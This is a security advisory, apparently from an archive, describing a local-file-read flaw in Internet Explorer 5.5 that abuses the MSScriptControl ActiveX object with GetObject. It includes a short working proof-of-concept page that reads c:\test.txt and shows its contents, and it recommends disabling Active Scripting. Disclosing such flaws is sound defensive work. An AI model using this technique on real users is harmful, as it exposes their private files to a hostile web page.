COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.5

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #41.
    By visiting a web  page with IE it  is possible to read  arbitrary
    local files (in very rare cases small amount of the file's content
    is lost) if the file name  is known and send them to  an arbitrary
    server.  It is also possible to read arbitrary web pages to  which
    the victim has access.

    Probably  this  bug  may  be  more  serious, have not investigated
    further - an interesting scenario seems to be playing with

        C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat

    which probably may lead to executing arbitrary programs.

    The    problem    seems     to    be     the    ActiveX     object
    "MSScriptControl.ScriptControl"  in  combination  with  GetObject.
    Examine the code below for more details.

    <html>
    <h2>
    Written by Georgi Guninski.
    <br>
    Reads c:\test.txt
    <br>
    </h2>
    <script>
    alert("This script reads C:\\TEST.TXT\nYou may need to create it\n")
    v=new ActiveXObject("MSScriptControl.ScriptControl.1");
    v.Language="VBScript";
    x=v.eval('GetObject("c:/test.txt","htmlfile")');
    setTimeout("alert(x.body.outerHTML);",2000);
    </script>
    </html>

    Demonstration:

        http://www.guninski.com/scractxdemo.html

SOLUTION

    To solve  this particular  issue disable  Active Scripting, though
    we do  not recommend  using IE  for browsing  the Internet because
    this is dangerous.